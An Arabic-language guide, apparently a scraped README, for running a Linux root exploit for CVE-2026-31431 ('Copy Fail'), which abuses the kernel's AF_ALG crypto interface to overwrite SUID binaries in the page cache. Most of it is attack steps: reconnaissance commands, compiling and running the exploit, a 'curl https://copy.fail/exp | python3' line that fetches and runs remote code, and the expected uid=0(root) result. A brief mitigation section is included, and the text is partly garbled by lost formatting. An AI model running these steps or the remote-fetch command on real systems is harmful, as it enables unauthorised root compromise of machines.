
استغلال تصعيد الامتيازات المحلية في Linux للثغرة CVE-2026-31431، عبر الكتابة فوق ذاكرة التخزين المؤقت للصفحات (page cache) لملفات SUID الثنائية من خلال واجهة AF_ALG للتشفير في النواة للحصول على صلاحيات root.
هذا المحتوى مخصص للأغراض التعليمية واختبارات الأمان المصرّح بها فقط. لا تقم بتشغيل هذا على أنظمة دون إذن صريح.
Copy Fail (CVE-2026-31431) هي ثغرة تصعيد صلاحيات محلي (LPE) في Linux تؤثر على واجهة برمجة تطبيقات التشفير في النواة عبر AF_ALG.
تتيح لمستخدم غير مصرّح له بالكتابة فوق بيانات page cache لملف ثنائي SUID (مثل /usr/bin/su) والحصول على صلاحيات root.
AF_ALGalgif_aeados.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
المؤشرات المتوقعة:
authencesn(hmac(sha256),cbc(aes))algif_aeadpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
النتيجة المتوقعة:
uid=0(root)
os.splice not foundالسبب:
الحل:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
الأسباب المحتملة:
ثبّت الأدوات المطلوبة:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
حدّث نظامك:
apt update && apt upgrade
إذا فشل الاستغلال، فكّر في:
استخدم هذا الاستغلال بمسؤولية في المختبرات و CTFs واختبارات الاختراق المصرّح بها فقط.